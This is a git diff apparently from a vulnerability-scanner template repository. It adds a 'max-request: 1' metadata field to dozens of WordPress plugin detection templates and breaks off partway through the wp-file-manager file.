tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ 